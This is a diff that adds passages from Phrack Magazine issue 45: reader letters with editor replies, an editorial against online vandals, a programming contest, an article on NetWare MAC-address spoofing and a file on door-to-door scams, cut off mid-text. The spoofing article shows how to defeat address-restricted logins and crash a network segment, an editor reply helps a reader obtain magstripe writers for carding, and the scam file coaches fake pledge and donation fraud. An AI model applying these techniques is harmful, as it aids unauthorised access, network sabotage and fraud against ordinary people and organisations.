+
+------------------------------------------------------------------------------
+
+VIRTUAL REALITY NOW AVAILABLE TO GENERAL PUBLIC AT CYBERMIND
+
+What is Virtual Reality?
+
+Virtual Reality (VR) is a computer generated, interactive 3D environment in
+which the computer serves as a window to an alternate reality.  Once immersed in
+this environment, the players interact with each other as well as the computer.
+
+Each VR system includes a head mounted display which provides a 3D graphical
+image along with full stereo sound.  By placing the display over your eyes, you
+are "virtually" transported to a computer-generated world that you control.
+Wherever you move, the computer tracks the movement of your body and displays
+the appropriate image to your eyes.  (If you looked up you would see the sky.
+If you looked down you would see your "feet.")  The unlimited choices you can
+make in these virtual worlds make the experience one-of-a-kind.
+
+Development of Virtual Reality: Past and Future
+
+Early VR was confined to multi-million dollar systems in research labs and
+military simulations.  However, the decreasing cost of computing power and
+display technology, VR now has more widespread applications: entertainment,
+education, worker training, telerobotics, medicine, teledildonics (virtual sex)
+and communication, among others.
+
+In the future, VR technology will allow you to travel, shake hands with people
+in other countries, walk on the moon or go shopping -- all without actually
+leaving the home or office.
+
+What is CyberMind?
+
+CyberMind is San Francisco's first location-based virtual reality entertainment
+center.  CyberMind center features eight interactive virtual reality machines
+that allow the general public to experience and learn about 3D virtual reality
+technology by playing imaginative, roleplaying games such as Dactyl Nightmare,
+Legend Quest, Flying Aces and ExoRex II.
+
+CyberMind Virtual Reality Center
+
+WHAT: Out of this world entertainment for families, couples, singles and groups.
+
+WHERE: One Embarcadero, Lobby Level (second floor).  At the top of the
+escalators.
+
+WHEN:  Normal Center Hours are 10:00 am to Midnight, seven days a week.
+
+HOW MUCH: Normal Pricing is $5.00 per play per person for a six minute
+experience.
+
+      20% discount for groups over 12 persons.
+
+      CYBERMIND CENTER RENTALS: For catered parties and receptions, contact
+Chris Figge at 415.693.0861
+
+WHY: It will blow your mind
+
+
+CyberMind Corp: Telephone 415.693.0861.  FAX: 415.693.0171.
+737 Pine Street, Suite 65, San Francisco, CA  94108
+
+[Uh, yeah.  And Stand in line with Beavis & Butthead.  Huh Huh, Cyber Stuff
+ is cool.  Heh heh.  Cool.  Yeah, I'm a Cyberpunk with $5 dollars.  Let's set
+ it on fire and throw it in the street.  No, Ass Munch, you can get stuff
+ with money.   Oh yeah, heh heh heh.]
+
+------------------------------------------------------------------------------
+
+Phrack:
+        Sorry to inconvenience you and PGP this message, but I fail to trust
+the people in charge of the server in which this message is being sent from.
+        Approximately six months ago I was playing around with the idea for a
+crypto-chat program.  In short:  You and the other people in the chat area,
+(IRC for example), would pick the same password or random seed number.  This
+would tell the chat program what algorithms to use, etc.  Hence forth whatever
+you type is encrypted and whatever is displayed remotely is automatically
+decrypted.
+        My only problem is that I do not know enough regarding cryptology to
+write a very secure encryption routine.  I have tried a few times to contact
+Cypherpunks, but to no avail, I have not received any letters back from them
+even regarding my request to be put on their mailing list.  I write to you,
+Phrack, in hopes that you can set me in the correct direction for making my
+crypto-chat program a reality.  I feel it would be an asset to the hack/phreak
+community and its struggle for more privacy.
+
+                        Thanx.
+-----------------------------------------guerilla AnArchy---------------------
+
+[Actually, it wouldn't be that hard to do, but you'd probably want to do
+ it as a DCC chat type thing, rather than going through a server at all.
+
+ I may be wrong, but I think someone may have worked on such a beast.
+ You may want to try again to contact the cypherpunks list
+ (cypherpunks@toad.com) (or to get added, cypherpunks-request@toad.com)
+ and ask around.  Otherwise, use the existing DCC Chat source, but
+ just change it to incorporate a public key exchange, and use those
+ exchanged keys to encrypt messages.  It would be harder for more than
+ one to one chat, but hell...no pain, no gain.
+
+ Notice, I didn't volunteer to do it.  Much too much work for me.]
+
+------------------------------------------------------------------------------
+
+Dear Phrack,
+
+Just finished reading Issue #42 (so I'm a little behind).  Must say,
+it was very kewl.  I have a little addition to the "Car Light Hack"
+in the Loopback section.  When coming up to an intersection with the
+pressure sensitive panels in the tar, pump the brakes hard so the
+car rocks back and forth.  This will fool the panel into thinking
+there's more weight (more cars) sitting on it and it will change the
+light faster.  This also works great with intersections where there
+are two panels--one at the light, and one six or seven car lengths
+back.  Either way, the light is guaranteed to change green quickly!
+
+[Yes.  Pressure pads are quiet common.  Probably much more so than the
+ light sensors.  Whatever works.]
+
+------------------------------------------------------------------------------
+
+        Hi there !
+
+        Last week I got in contact with your magazine (#44) and a soft
+called Bluebeep, because I wanted to call BBSs all over the world.
+Reading Phrack, I got more interested is hacking stuff, which I do since
+I first touched a computer when I was 9 (now I'm 20).
+
+        So, since you offered in the magazine :), I'd like to get some
+info about the subject, specially about free callings. Here is the
+story.
+
+        Here in Brazil most of the computers have been IBM mainframes
+for a long time, only now changing to UNIX & LANs. Phone lines were a
+shit too, I could say that batter than most since my father works for
+the Brazilian phone co. (Embratel) And that's my point. Brazilian phone
+co. is (still) owned by the federal government. NEC and AT&T are trying
+to end the monopoly. But I think it's much easier to hack it since there
+aren't many hackers here and they don't do a big mess. What should I do
+and have to try this. See, I'm very rookie, so would like some
+guidelines... People here is very afraid to talk about. BTW, could a
+AT&T guy bust me (here, in Rio de Janeiro) for using Bluebeep in the
+000-8010 ?!?
+
+        Are there other means of doing free calls ? Embratel has it's
+own Calling Card...
+
+        Wish I can have your help... I'm a RPG-fanatic and would like to
+connect to Illuminati BBS and others, so I could get more info.
+
+        Thanx,
+
+        []s  CAD
+
+[I wouldn't worry as much about the AT&T guy busting you, as I would
+ the Brazilian Secret Police shooting you for boxing.  I mean, if the
+ government still owns the phone company, they are the ones to watch out for.
+
+ To contact Steve Jackson Games and the Illuminati BBS, you should think
+ about signing on to io.com.  That is their Internet site.  It's very
+ cool, and has a huge MUD, (if you are into those sort of things.)
+
+ Good luck in Brazil, and please consider doing a file for our International
+ Scene section on your Country!]
+
+------------------------------------------------------------------------------
+
+- Translation by MIND-NRG (Rome, Italy)
+
+[All words between [] are additional comments made by the translator]
+
+Speciale Cyber                                                  September, 1993
+~~~~~~~~~~~~~~
+by Sergio Stingo (King) [ A good italian magazine ]  (P. 131)
+
+CyberPunk: everbody is talking about it, but only few people really know what
+it really is. Electronic Books ? A disturbing view of the next future ?
+Electronical conferences ? A new sort of fashion-wears ? The biggest
+democratic revolution of our age ? A silent and creeping revolution ?
+Our Stingo [perhaps a male journalist ?], always curious about everything
+that is <<new>>, is travelling around Italy to investigate about this
+phenomenon.
+
+It was like taking the lid off a brewing pot. The more He met <<cyber>>
+the more He understood that there was much more to be discovered;
+from the supporter of the <<brain machine>>, who is testing the mysterious
+machine into  discos and  universities, to the first art gallery where
+hackers' work of art are exhibited; from the cyber magazines, as <<Decoder>>,
+to the bands that are discovering a new style of music. Not mentioning sex,
+that, thanks to technology, is trying to increase the range of possible
+sensations. So, the trip beyond the borders of the universe was so rich and
+adventurous, that We have had to divide this articles into two issues.
+In this issue We introduce you to the first one. And, as cybernauts are used
+to say, have a good navigation.
+
+
+[ This is the translation for you boys interested into this article. Have a
+good time with it <g>.CyberPunks are unknown in Italy. It's possible to find
+poor articles on them, but no serious issues.]
+
+                                                      - MIND-NRG -
+
+
+[Hey Man!  Thanks for the translation!  I was wondering what that King
+ Magazine article was saying.  Hehe, I ought to get you to translate the
+ whole article!  Haha...Spanish I could do myself, but Italian is a
+ little too different.
+
+ BTW: We don't have an article on the Italian Hacking scene either.
+ Obviously you guys have developed quite a subculture.  We'd really
+ like to hear more!]
+
+------------------------------------------------------------------------------
+
+This message is in regard to the following article in Phrack #42.
+I was just wondering if there was a way to convert the newer
+sportsters.  My modem does have 4.1 roms, at least that is what
+ati6 displays.  however my modem has problems with the second line
+of command:
+
+
+               "Turning your USR Sportster w/ 4.1 roms
+                    into a 16.8K HST Dual Standard"
+
+                                   by
+
+                      The Sausage with The Mallet
+
+
+If you have a USRobotics Sportster FAX modem, Ver 4.1, you can issue
+the following commands to it to turn it into an HST 16.8K dual standard.
+In effect, you add HST 16.8K to its V32.bis 14.4k capability.
+
+ats11=40v1L3x4&h1&r2&b1e1b1&m4&a3&k3
+atgw03c6,22gw05cd,2f
+ats14=1s24=150s26=1s32=8s34=0x7&w
+
+I would appreciate it if you could somehow forward the message to
+either the authors.  I realize that this is an old article, but
+I would really appreciate any reply to this question.
+
+     Sincerely,
+     Sam F.
+
+[Wow.  I have no idea.  I do know that later versions of the modem
+ took out that, uh, "Feature."  But keep in mind, as modems progress
+ they big feature that everyone wants is flash eprom for the
+ software, so that you can upgrade the modem through software.
+
+ The future holds a lot of fun for the person who gets his or her hands
+ upon the reprogramming tool and rom images of upgrades for faster
+ modems.]
+
+------------------------------------------------------------------------------
+
+Phrack:
+
+I would like first to express all my gratitude to you, the Phrack
+editor, and to all of its contributors. You are doing a great job and
+should get credit for it. What really kills me are those wanna-be
+hackers writing you in an often offensive manner, requesting for
+information that no real hacker would expect to see in Phrack. Or
+those sending the /etc/passwd file of their local University and
+thinking they've achieved the hack of the century.
+
+I've been reading Phrack for quite long time now and was wondering how
+to contribute to it, considering that almost every hackable subject has
+been covered in one of the 44 Phrack issues.
+I saw in issue 42 that you were sort of interested to collect H/P field
+information from countries other than United States. And I thought it
+might be an opportunity for me to send you something that was uncovered
+before. I'm quite sure that you can easily find foreign contributors for
+European countries so I will probably not bother you with H/P-related
+data in France and Sweden (where I used to live). Few months ago, I
+settled in the Asian country you'll identify from my e-mail address and
+have started investigating, in a relaxed mode, hacking and phreaking
+areas. This country is a virgin territory and maybe my researches and
+experiments would provide guidelines for H/P-ers in the same lonely
+situation.
+
+I was wondering though if you had any kind of recommendations for such
+reports (style, length, depth of details to be given, etc...)
+If anybody in the Far-East area is interested to participate in the
+writing of the report, or just willing to share knowledge with me,
+please feel free to forward my e-mail address to such people.
+
+Disclaimer:
+Even if I really have the intention to write such a report, no warranty
+should be made upon the delivery time of it. My job is time-consuming
+and leave me very few time for investigations. Apart from that, life in
+this country is also highly entertaining and week-ends are mostly spent
+on parties with nice, nice people.
+
+~~ Long live Phrack and its famous skilled contributors. ~~
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+                                             -- Otto Sync --
+
+[Thanks for the letter of appreciation!  As far as contributions go,
+ we are interested in anything and everything.  For your scene file,
+ just use some of the files on other countries as examples, and I'm sure
+ yours will be fine.
+
+ Don't worry about getting it to me in any hurry.  Phrack 46 is 3 months
+ away.  :)  ]
+
+------------------------------------------------------------------------------
+
+Hey, guyz!
+
+What happened to the magazine, I haven't seen any number after 43... In any
+case, send the stuff to me, as soon as possible. Preferably in some kind of
+compressed format.
+
+I have got here a small question. Firstly, I noticed that a number of
+hackers have E-Mail addresses such as *@phantom.com. Is it possible to get
+one just like this, or you've gotta be some kind of a masquotte?
+
+I myself am a god-fearing character, not hacking outside my own domain. I
+prefer to produce than to steal. However, I lack chatting and I lack money,
+but I wouldn't steal it. Just to get a different view - for you. Not every
+curious person has to be a criminal.
+
+Greetings,
+  Verdura (aka Vegetable)
+
+[Phantom Access is a public access unix that you can get access to just
+ by telnetting to phantom.com and applying as a new user.
+
+ Yes, indeed, there are a lot of hackers on phantom.com.  In fact, a large
+ number of us ancient LOD types are on there.  More than you would
+ imagine, really.  But it is open to the public, and anyone who cares to
+ pay the usage fees can hang out.
+
+ As far as back issues, I don't send them out to anyone.  They are available
+ for ftp from ftp.netsys.com in /pub/phrack as .zip files.
+
+ I do make exceptions for people without ftp access, and will mail
+ (US Mail) disks to whoever sends me postage to:
+
+ Phrack Magazine
+ 603 W. 13th #1A-278
+ Austin, TX 78701  ]
+
+------------------------------------------------------------------------------
+
+Dear phrack type person:
+
+  I am working on a carding scheme involving stripe-writers.  I have looked
+into getting one but it seems impossible to find someone to sell me one!
+I know publishing information like that is VERY stupid seeing as many
+government officials read phrack without paying for it. And many lamer
+asswipes read it to. That company would stop selling faster than a lamer
+on IRC gets kicked! I need any information on acquiring such a PERFECTLY
+LEGAL device because of the places I tried I could not find one that would
+sell me one!  I also need any tips on magstipe encoding and atm machines
+available. I am adept in the circles of phreekdom and can call Boards if
+need be.  And by the way this board I am mailing from has a dickhead for a
+sysop. I would mail from the public access internet site here, but
+They found my uid shells and kicked me off. They called the cops but being
+the most advanced police force in the nation they haven't a clue how to
+contact me. (the system only asks for you name to get an account) But now
+they require picture ID to get an account. It's a bitch but I have to get
+a fake ID and a fake parent.  I was also attempting to DL cracker jack
+when They kicked me off and I would like to know were I could gopher for it
+or ftp if need be. I lost most internet access except gopher and mail from
+this crap board. ENCRYPT EVERYTHING cause the sysop sux.  I would like to
+subscribe to phrack but this bastard would delete 1 meg of mail quite quickly
+unless it is small, zipped and uuencoded I guess. Well anyway I hope to hear
+from you.
+
+The government can have my encryption keys when they pry them from my cold
+dead hands.
+
+-Phiber Phreak
+
+[It's pretty hard to get such a magstripe writer, but the keyword here is
+ MONEY.  If you have money, they will sell you damn near anything.  You may
+ want to check Bank Technology News (800-835-8403 for subscription) as they
+ have periodic vendor lists.  Additionally you can ask them for a copy of
+ their Card Industry Directory which will have all the info on suppliers that
+ you could ever dream of.  It has a 15 day trial period too, so read it,
+ get what you need and return it (for a full refund).
+
+ As far as Cracker Jack goes, get on #hack sometime and ask.  I don't have
+ a copy, but i imagine someone online will be able to DCC it to you.]
+
+------------------------------------------------------------------------------
+
+                              ==Phrack Magazine==
+
+                 Volume Five, Issue Forty-Five, File 3a of 28
+
+****************************************************************************
+
+
+I try my best to keep Phrack unbiased.  For those of you who know me,
+you know that I am not the most soft-spoken individual in the world, and
+not being able to totally flame everyone and everything puts a great deal
+of stress on me.  This editorial space is my one saving grace.  In this
+I can spew out incredible amounts of crap and everyone should know that
+it is MY OPINION only.
+
+If anyone else wants to write a "guest" editorial, feel free to email
+it to phrack@well.com.
+
+---------------------
+
+This issue I'm going to rant and rave about assholes on the net.
+
+You know who you are.
+
+You break into sites without any purpose, you delete files, you harass
+and annoy, you attempt blackmail, you fake mail, you fake news, you
+sling racial insults and you generally have nothing to offer the
+world.
+
+You are a disgrace to the hacker community.
+
+--------------------
+
+There have always been confrontations online.  It's unavoidable on
+the net, as it is in life, to avoid unpleasantness.  However, on the net
+the behavior is far more pronounced since it effects a much greater
+response from the limited online environments than it would in the real
+world.  People behind such behavior in the real world can be dealt with or
+avoided, but online they cannot.
+
+In the real world, annoying people don't impersonate you in national
+forums.  In the real world, annoying people don't walk into your room
+and go through your desk and run through the town showing everyone your
+private papers or possessions.  In the real world, people can't readily
+imitate your handwriting or voice and insult your friends and family by
+letter or telephone.  In the real world people don't rob or vandalize
+and leave your fingerprints behind.
+
+The Internet is not the real world.
+
+All of the above continually happens on the Internet, and there is
+little anyone can do to stop it.  The perpetrators know full well how
+impervious they are to retribution, since the only people who can put
+their activities to a complete halt are reluctant to open cases against
+computer criminals due to the complex nature of the crimes.
+
+The Internet still clings to the anarchy of the Arpanet that spawned it,
+and many people would love for the status quo to remain.  However, the
+actions of a few miscreants will force lasting changes on the net as a
+whole.  The wanton destruction of sites, the petty forgeries, the
+needless breakins and the poor blackmail attempts do not go unnoticed
+by the authorities.
+
+I personally could care less what people do on the net.  I know it is
+fantasyland.  I know it exists only in our minds, and should not
+have any long lasting effect in the real world.  Unfortunately, as the
+net's presence grows larger and larger, and the world begins to accept
+it as an entity in and of itself, it will be harder to convince
+those inexperienced users that the net is not real.
+
+I have always played by certain rules and they have worked well for me
+in the nearly 15 years I've been online.  These rules can best be
+summed up by the following quote, "We are taught to love all our
+neighbors.  Be courteous.  Be peaceful.  But if someone lays his hands
+on you, send them to the cemetery."
+
+The moment someone crosses the line, and interferes with my
+well-being in any setting (even one that is arguably unreal such as the
+Internet) I will do whatever necessary to ensure that I can once again
+go about minding my own business unmolested.  I am not alone in this
+feeling.  There are hundreds of net-loving anarchists who don't want the
+extra attention and bad press brought to our little fantasyland by
+people who never learned how to play well as children.  Even these
+diehard anti-authoritatians are finding themselves caught in a serious
+quandary:  do they do nothing and suffer attacks, or do they make the
+phone call to Washington and try to get the situation resolved?
+
+Many people cannot afford the risk of striking back electronically,
+as some people may suggest.  Other people do not have the skill set needed
+to orchestrate an all out electronic assault against an unknown, even
+if they pay no heed to the legal risk.  Even so, should anyone attempt
+such retribution electronically, the assailant will merely move to a new
+site and begin anew.
+
+People do not like to deal with police.  No one LOVES to
+call up their local law enforcement office and have a nice chat.
+Almost everyone feels somewhat nervous dealing with these figures
+knowing that they may just as well decide to turn their focus on you
+rather than the people causing problems.  Even if you live your life
+crime-free, there is always that underlying nervousness; even in the
+real world.
+
+However, begin an assault directed against any individual, and I
+guarantee he or she will overcome such feelings and make the needed
+phone call.  It isn't the "hacking" per se that will cause anyone's
+downfall nor bring about governmental regulation of the net, but the
+unchecked attitudes and gross disregard for human dignity that runs
+rampant online.
+
+What good can come from any of this?  Surely people will regain the
+freedom to go about their business, but what of the added governmental
+attentions?
+
+Electronic Anti-Stalking Laws?
+Electronic Trespass?
+Electronic Forgery?
+False Electronic Indentification?
+Electronic Shoplifting?
+Electronic Burglary?
+Electronic Assault?
+Electronic Loitering?
+Illegal Packet Sniffing equated as Illegal Wiretaps?
+
+The potential for new legislation is immense.  As the networks
+further permeate our real lives, the continual unacceptable behavior
+and following public outcry in that setting will force the ruling
+bodies to draft such laws.  And who will enforce these laws?  And who
+will watch the watchmen?  Oftimes these issues are left to resolve
+themselves after the laws have passed.
+
+Is this the future we want?  One of increased legislation and
+governmental regulation?  With the development of the supposed
+National Information Super-Highway, the tools will be in place for a new
+body to continually monitor traffic for suspect activity and uphold
+any newly passed legislation.  Do not think that the ruling forces have
+not considered that potential.
+
+We are all in a serious Catch-22, brought about by a handful of
+sociopaths.  When an unwanted future arises as a direct, or indirect,
+result of their actions, REMEMBER.
\ No newline at end of file
diff --git a/phrack45/4.txt b/phrack45/4.txt
new file mode 100644
index 0000000..b4d8536
--- /dev/null
+++ b/phrack45/4.txt
@@ -0,0 +1,1084 @@
+                         ==Phrack Magazine==
+
+              Volume Five, Issue Forty-Five, File 4 of 28
+
+
+                           //   //  /\   //   ====
+                          //   //  //\\ //   ====
+                         ==== //  //  \\/   ====
+
+                     /\   //  // \\    //  /===   ====
+                    //\\ //  //   //  //   \=\   ====
+                   //  \\/    \\ //  //   ===/  ====
+
+                                 PART I
+
+------------------------------------------------------------------------------
+
+                        !! NEW PHRACK CONTEST !!
+
+Phrack Magazine is sponsoring a programming contest open to anyone
+who wishes to enter.
+
+Write the Next Internet Worm!  Write the world's best X Windows wardialer!
+Code something that makes COPS & SATAN look like high school Introduction
+to Computing assignments.  Make the OKI 1150 a scanning, tracking, vampire-
+phone.  Write an NLM!  Write a TSR!  Write a stupid game!  It doesn't
+matter what you write, or what computer it's for!  It only matters that you
+enter!
+
+Win from the following prizes:
+
+     Computer Hardware & Peripherals
+     System Software
+     Complete Compiler packages
+     CD-ROMS
+     T-Shirts
+     Magazine Subscriptions
+     and MANY MORE!
+
+STOP CRACKING PASSWORDS AND DO SOMETHING WITH YOUR LIFE!
+
+Enter the PHRACK PROGRAMMING CONTEST!
+
+The rules are very simple:
+
+1)  All programs must be original works.  No submissions of
+    previously copyrighted materials or works prepared by
+    third parties will be judged.
+
+2)  All entries must be sent in as source code only.  Any programming
+    language is acceptable.  Programs must compile and run without
+    any modifications needed by the judges.  If programs are specific
+    to certain platforms, please designate that platform.  If special
+    hardware is needed, please specify what hardware is required.
+    If include libraries are needed, they should be submitted in addition
+    to the main program.
+
+3)  No virii accepted.  An exception may be made for such programs that
+    are developed for operating systems other than AMIGA/Dos, System 7,
+    MS-DOS (or variants), or OS/2.  Suitable exceptions could be, but are not
+    limited to, UNIX (any variant), VMS or MVS.
+
+4)  Entries may be submitted via email or magnetic media.  Email should be
+    directed to phrack@well.com.  Tapes, Diskettes or other storage
+    media should be sent to
+
+         Phrack Magazine
+         603 W. 13th #1A-278
+         Austin, TX 78701
+
+5)  Programs will be judged by a panel of judges based on programming skill
+    displayed, originality, usability, user interface, documentation,
+    and creativity.
+
+6)  Phrack Magazine will make no claims to the works submitted, and the
+    rights to the software are understood to be retained by the program
+    author.   However, by entering, the Author thereby grants Phrack Magazine
+    permission to reprint the program source code in future issues.
+
+7)  All Entries must be received by 12-31-94.  Prizes to be awarded by 3-1-95.
+
+-------------------------INCLUDE THIS FORM WITH ENTRY-------------------------
+
+Author:
+
+Email Address:
+
+Mailing Address:
+
+
+
+Program Name:
+
+
+Description:
+
+
+
+
+Hardware & Software Platform(s) Developed For:
+
+
+
+Special Equipment Needed (modem, ethernet cards, sound cards, etc):
+
+
+
+Other Comments:
+
+
+
+
+------------------------------------------------------------------------------
+
+Novell NetWare & Ethernet address spoofing with ODI
+---------------------------------------------------
+
+Just to save you from the boredom of Yet Another UNIX  Security Weakness, here
+are some things to consider about Novell NetWare for your next Security Audit
+or Hacking session (depending on which side you are on).
+
+Novell claim to have  over 20 million PCs using their network operating system,
+substantially more than the estimated 4 million TCP/IP systems worldwide.
+There are many reasons for its popularity and its 60 to 80% market share, one
+of which has been its relatively good security.
+
+NetWare has been one of the few widely available systems which offer some form
+of login encryption of accounts and passwords over the wire, as standard,
+unlike most of its rivals which send them out as plaintext, even if they are
+stored in an encrypted form eventually. Novell now offer RSA based public key
+encryption of the data as well.
+
+However, since it is so popular, there are likely to be plenty of systems out
+there which have not been upgraded to the latest versions and patch releases
+and which may be still be vulnerable to programs like KNOCK , the patched
+ATTACH command (published in HackTic 16/17 1992), or the University of Leiden's
+HACK (which has been published in issue 43 of PHRACK)
+
+Since the latest security features are implemented as NetWare Loadable Modules
+for NetWare 3x and 4x, but as Value Added Processes for NetWare 2x,  which
+require the server to be brought down to install them, it is likely that there
+are many NetWare 2x systems which are still vulnerable
+
+I shall also assume that you are not on one of those wide open "box shift"
+installations where none of the  security features have been switched on (try
+logging in as SUPERVISOR or GUEST  without a password), all the programs and
+data are in a single SYS: volume and the Network Address of the cable is the
+default 00000001.
+
+Like any project, the more you know about your particular Novell LAN, the
+easier it gets to "explore". Login as GUEST or a normal account.
+
+Try to see who else is on the system e.g.
+
+USERLIST /A >c:\ulist.txt
+
+will give you a list of users currently logged in, with their Ethernet card
+addresses saved to a text file . Your current connection will be marked with
+an asterisk. If your system has 100 or more users, then any sane Supervisor
+will have used some form of logic when allocating the user's login accounts,
+probably based on personnel or id number, often including their initials.
+
+SYSCON with privilege is what you are aiming to be able to use, but even
+without any privileges, you can still use it to look at your own account,
+change your password etc. You can also see a list of all the other registered
+users.
+
+This should help you sort the accounts into normal and privileged accounts
+(obviously SUPERVISOR, but often there are SUPERVISOR equivalent accounts, or
+Work Group Manager accounts which stand out from the list). You are quite
+likely to see an account called something like TAPE_BACKUP  or DATA_LOGGER,
+TRAINER, STUDENT1, STUDENT2  i.e. accounts which do not belong to individual
+humans. These often require abnormal security privileges e.g. normal users may
+have their connections broken by the WATCHDOG at say midnight, to ensure that
+they are not modifying files during the nightly tape backup. At an academic or
+industrial site, you are likely to find data logging PCs connected to
+instrumentation or machinery which needs to be monitored or controlled 24
+hours a day. These PCs are likely to have 24 hour accounts which are not time
+restricted at weekends, for example.
+
+Since it is usually more practical to do tape backups (DAT or helical scan)
+from a separate, dedicated PC rather than from the fileserver itself (one tape
+unit might also back up several fileservers), these PCs are likely to use an
+account e.g. TAPE_BACKUP which is a SUPERVISOR equivalent. If you can get
+physical access to this sort of PC, either datalogger, or tape backup unit,
+you  have a good chance of finding the password on the local drive C:,
+possibly in a file with Hidden and/or System attributes (have a look at the
+AUTOEXEC.BAT and see what it calls)
+
+The security aware Novell supervisors, will have set up any such accounts with
+an extra level of security which restricts logins to only those Ethernet
+addresses which have been specified. The really sensible ones will have made
+sure that any such machines are sited in physically secure areas, as well.
+
+Although this is a very good idea, from the security point of view, Novell
+have now provided a mechanism which allows you to get around this:
+the replacement for monolithic IPX/NETX called Open Datalink Interface (ODI)
+
+Novell's ODI, and its slower Microsoft equivalent Network Driver Interface
+Specification (NDIS), both work by putting a common layer of software between
+the hardware of the Network Interface Card and the rest of the MSDOS
+Redirector. This allows multiple protocol stacks and frame types to be bound
+to the same physical card e.g.
+
+IPX    TCP/IP    NETBeui   DECnet   Appletalk
+----------------------------------------------
+Link Support Layer
+----------------------------------------------
+Hardware Specific device driver e.g. NE2000
+
+Thus, to start up NetWare on older systems, you had to generate a hardware
+specific version of IPX.EXE for your Ethernet card,
+
+IPX
+NETX
+
+Extra parameters were set in SHELL.CFG, now under ODI, things are a little
+bit more complex:
+
+LSL
+NE2000
+IPXODI
+NETX
+
+The same parameters as in SHELL.CFG such as preferred server or machine type
+(if you have different versions of MSDOS for different types of PC) can be
+specified in NET.CFG. With ODI, there are more parameters for NET.CFG but the
+worrying/interesting one is the ability to specify a different MAC level
+address to that of your actual Ethernet card. It needs this ability
+to cope with  TCP/IP or DECnet coexistence e.g.
+
+BUFFERS 100
+MACHINE TYPE COMPAQ
+PREFERRED SERVER FINANCE
+NODE ADDRESS AA-00-04-00-12-34
+
+Since this DECnet address does not depend on the "real" unique Ethernet
+address which has been burnt into the PROM on the card and is centrally
+registered (originally by Xerox, but now by the IEEE), this mechanism allows
+you to put a different Ethernet card address into NET.CFG, thereby fooling the
+Address Restriction security.
+
+e.g. NODE ADDRESS 02-60-80-12-34-56
+
+This is where the data you gathered earlier with USERLIST and SYSCON becomes
+threatening/useful.
+
+Of course, if your target PC is on a different LAN segment, there may be Routers
+or intelligent hubs which restrict your ability to do this, or at least record
+attempts in a log files which can trace your activity, provided that suspicions
+are aroused before they are periodically wiped out.
+
+How much of  a security threat this little work around constitutes depends on
+your specific site, but there is another danger/opportunity, namely that of a
+denial of service or nuisance attack on the LAN.
+
+If you set this connection parameter to be the same as that of another PC, the
+fileserver (Novell, DEC or UNIX)  and the Ethernet has no way of preventing
+some packets intended for just one unique address going to the other, if they
+are both online at the same time. This usually results in PC hangs, incomplete
+closure of files, File Allocation Table problems (usually curable by running
+CHKDSK C: /F, but not within Windows or you will make things worse).
+
+If by accident or design, you set your PC to have the same address as the
+fileserver (Novell, DEC or UNIX) or a router, then you can cause havoc to the
+whole network segment (even before you have started to play your multiplayer
+DOOM Deathmatch !).
+
+This could be achieved with a simple  command in the AUTOEXEC.BAT  e.g.
+
+echo NODE ADDRESS fileserver Ethernet address >>C:\ODI\NET.CFG
+
+which  will only take effect the next time the PC is re-booted (allowing a good
+headstart for the perpetrator)
+
+This could  also be the payload of a virus, which would cause more havoc than
+simply trashing the hard disk of a single PC.
+
+This problem is due to the inherent design weaknesses of TCP/IP and DECnet,
+which were developed at a time when the number of mini-computers that they
+connected could be counted on your fingers,. DEC or Xerox or Prime etc
+sales teams  could only have dreamed of selling thousands of mini computers to a
+single customer. Nowadays, thousands of PCs connected to central servers are
+quite common, and the problems of duplicate addresses is significant.
+
+These same features are what make Ethernet Packet Sniffing possible, which
+is what was behind the recent CERT warning and media hype about Internet
+password security, but that is a topic for another article.
+
+Otaku
+
+------------------------------------------------------------------------------
+
+$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
+
+SCAMMING
+DIFFERENT TECHNIQUES AND
+PROCEDURES
+
+   BY: MARZ
+
+$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
+
+Table of Contents:
+1.0 Intro
+1.1 Different types of scams
+1.2 The right one for you
+
+2.0 The Pledge scam
+2.1 The Donation scam
+2.2 The Selling scam
+
+3.0 What to wear
+3.1 Where to go
+
+4.0 Thanks
+
+1.0 The Intro
+
+First off I would like to say that this file is for entertainment only
+and that you really shouldn't do the stuff mentioned, and the writer doesn't
+take any responsibility for any of the crap people do.
+
+1.1 Different types of scams
+
+Ok in this file I will tell you about 3 types of scams the Pledge scam,
+The Donation scam, and the Selling scam. There are many other scams out there
+which I will cover in future files for instance credit card scams although
+companies are trying harder and harder to prevent this it is still happening.
+
+1.2 The right one for you
+
+Al right now every person is different so in turn so are scams and some
+people and scams don't mix to well for instance if you way 300 Pounds you cant
+really say you are the start cross country runner. So if you are 300 pounds say
+you are the start wrestler/football player. Also age plays a BIG factor if
+you are  30 years old you aren't going to pass to well for a high school
+football player (you always could say you flunked) and if you are 10 years old
+people aren't going to be to anxious to give you donations to save the Rain
+Forests.  Al right I am going to start going into more detail about the right
+scam for you.
+
+Look at my little chart below:
+
+Age            good scam
+-----        -----------
+  -10        | selling or pledge
+11-17        | selling, pledge , or maybe even donations (if old looking)
+   18+       | selling and donations
+
+2.0 The Pledge scam
+
+Al right this scam works great for kids still in school go around asking
+people (that don't live around you) to pledge money for you so your team can
+afford to go to the state meet or what ever. For example one I use is I go to
+peoples houses asking for donations in my Track teams Lap-athon saying that we
+will be running laps for 3 hours to raise money so we can go and compete in the
+state meet. I will ask people if they want to pledge a certain flat amount or
+if they would like to pay me for each individual lap. I will normally have
+printed out a sheet like the one bellow on my computer .
+
+Name                   Address                                   Amount/lap
+
+
+
+Not only does having a sheet like that help you keep track of who bought
+your scam and who you need to collect from it makes the target (person your
+trying to scam) not worried like they might be if they see you writing it on a
+sheet of note book paper.  Now then you have collected a list of people wiling
+to pledge you go back to the address you wrote down and tell them (for
+example you ran 91 laps in 3 hours) make sure your number is not totally out of
+per portion like I ran 150 laps in 3 hours. Also for some reason numbers like
+50, 70, 80, 110 people don't like people like to see 41, 73, 127, etc.. don't
+ask me why but that's what I have noticed. Ok so you now are at the persons
+house and they ask if they can write a check oh shit not a check.. well there's
+a couple things you could do ask them if they could possibly make it cash (
+Might make them suspicious) ask them to write it to your coach give them your
+name  (VERY dangerous) or you could just give them a phony name and lose out.
+One time this happened to me a lady pledged me $.25 a lap (very high amount
+you won't get much of these) and I told her I ran 93 laps she believed me and
+wanted to make out a check for the amount which was about $23 at that
+time I just happened to be buying some computer equipment I knew the
+guy's name so I gave her that name and I paid for some of the equipment with
